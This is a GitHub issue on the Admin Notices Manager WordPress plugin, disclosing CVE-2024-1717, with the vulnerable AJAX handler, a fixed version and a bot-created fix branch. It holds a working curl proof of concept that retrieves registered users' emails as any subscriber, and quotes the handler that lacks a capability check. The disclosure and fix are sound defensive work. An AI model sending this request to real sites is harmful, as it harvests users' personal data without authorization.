Melapress / admin-notices-manager

Admin notices manager is a WordPress plugin that allows you to better manage the admin notices in the WordPress dashboard so you read them at your own convenience and never miss an important message.
https://www.wpwhitesecurity.com/wordpress-plugins/admin-notices-manager/

<= 1.4.0 - Missing Authorization to Authenticated (Subscriber+) User Email Retrieval #96

Closed robert81 closed 3 months ago

robert81 commented 3 months ago

Vulnerability Report

Vulnerability Title: Admin Notices Manager <= 1.4.0 - Missing Authorization to Authenticated (Subscriber+) User Email Retrieval
CVE ID: CVE-2024-1717
CVSS Severity Score: 4.3 (Medium)
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N
Organization: Wordfence
Vulnerability Researcher(s): Lucio Sá
Software Link(s): https://wordpress.org/plugins/admin-notices-manager

Description

The Admin Notices Manager plugin for WordPress is vulnerable to unauthorized access of data due to a missing capability check on the handle_ajax_call() function in all versions up to, and including, 1.4.0. This makes it possible for authenticated attackers, with subscriber-level access and above, to retrieve a list of registered user emails.

Proof of Concept

It happens because of the "select2-wpwhitesecurity" vendor package that has an outdated version:


```php
/**
 * Handles AJAX requests from the autocomplete controls.
 */
public static function handle_ajax_call() {
	// TODO verify nonce
	// No capability check here: any authenticated user can reach get_users().

	// Check the 'entity' parameter.
	if ( ! array_key_exists( 'entity', $_REQUEST ) ) {
		wp_send_json_error( 'Data type not defined.' );
	}
	if ( ! array_key_exists( 'term', $_REQUEST ) ) {
		wp_send_json_error( 'Search term is missing.' );
	}

	$result      = array();
	$entity      = sanitize_text_field( wp_unslash( trim( $_REQUEST['entity'] ) ) );
	$search_term = sanitize_text_field( wp_unslash( trim( $_REQUEST['term'] ) ) );

	switch ( $entity ) {
		case 'user':
			$result = self::get_users( $search_term );
			break;
		case 'post':
			$result = self::get_posts( $search_term );
			break;
		default:
			wp_send_json_error( 'Unsupported data type.' );
	}

	echo wp_json_encode(
		array(
			'results' => $result,
		)
	);
	die();
}
```

Send the cURL below to get the emails:

```shell
curl --request POST \
  --url http://site_url/wp-admin/admin-ajax.php \
  --header 'Content-Type: multipart/form-data' \
  --header 'Cookie: COOKIE' \
  --form action=wpws_s24wp \
  --form entity=user \
  --form term=
```

You can use the "term" field to filter the results.

Any Known Public References

https://plugins.trac.wordpress.org/browser/admin-notices-manager/trunk/vendor/wpwhitesecurity/select2-wpwhitesecurity/load.php#L58

Recommended Solution

We recommend adding a capability check as well as nonce validation to the handle_ajax_call function, or hide sensitive data from non-privileged users.
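As an added example (not the plugin's own code, nor part of the report above), this is what a hardened handle_ajax_call() following the recommendation looks like: nonce validation, a capability check, and a user search that never returns e-mail addresses. The nonce action name 'wpws_s24wp', the 'nonce' request field and the manage_options capability are assumptions; the real plugin may use different names.

```php
/** Hardened handle_ajax_call(): nonce + capability + data minimisation. */
public static function handle_ajax_call() {
	// Nonce (assumed name 'wpws_s24wp', sent as the 'nonce' field): dies with -1
	// on failure. Stops CSRF but NOT a logged-in subscriber holding a valid nonce.
	check_ajax_referer( 'wpws_s24wp', 'nonce' );

	// Capability: the check behind CVE-2024-1717 (assumed: manage_options).
	if ( ! current_user_can( 'manage_options' ) ) {
		wp_send_json_error( 'Insufficient permissions.', 403 );
	}

	if ( ! array_key_exists( 'entity', $_REQUEST ) ) {
		wp_send_json_error( 'Data type not defined.' );
	}
	if ( ! array_key_exists( 'term', $_REQUEST ) ) {
		wp_send_json_error( 'Search term is missing.' );
	}

	$result      = array();
	$entity      = sanitize_text_field( wp_unslash( trim( $_REQUEST['entity'] ) ) );
	$search_term = sanitize_text_field( wp_unslash( trim( $_REQUEST['term'] ) ) );

	switch ( $entity ) {
		case 'user':
			// Return only what a picker needs; fixing search_columns also stops
			// the search acting as an e-mail oracle (WP_User_Query searches
			// user_email for terms containing '@' unless columns are given).
			$users = get_users(
				array(
					'search'         => '*' . $search_term . '*',
					'search_columns' => array( 'user_login', 'display_name' ),
					'fields'         => array( 'ID', 'display_name' ),
					'number'         => 20,
				)
			);
			foreach ( $users as $user ) {
				$result[] = array( 'id' => (int) $user->ID, 'text' => $user->display_name );
			}
			break;
		case 'post':
			$result = self::get_posts( $search_term );
			break;
		default:
			wp_send_json_error( 'Unsupported data type.' );
	}

	// Same response shape as the original so the select2 control keeps working.
	wp_send_json( array( 'results' => $result ) );
}
```

The nonce check alone would not have closed this report, since a subscriber who can load the page that embeds the nonce still obtains a valid token; the capability check is the control that matters here.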

sdobreff commented 3 months ago

/cib

create-issue-branch[bot] commented 3 months ago

Branch issue-96-_=_1_40-_Missing_Authorization_to_Authenticated_Subscriber+_User_Email_Retrieval created!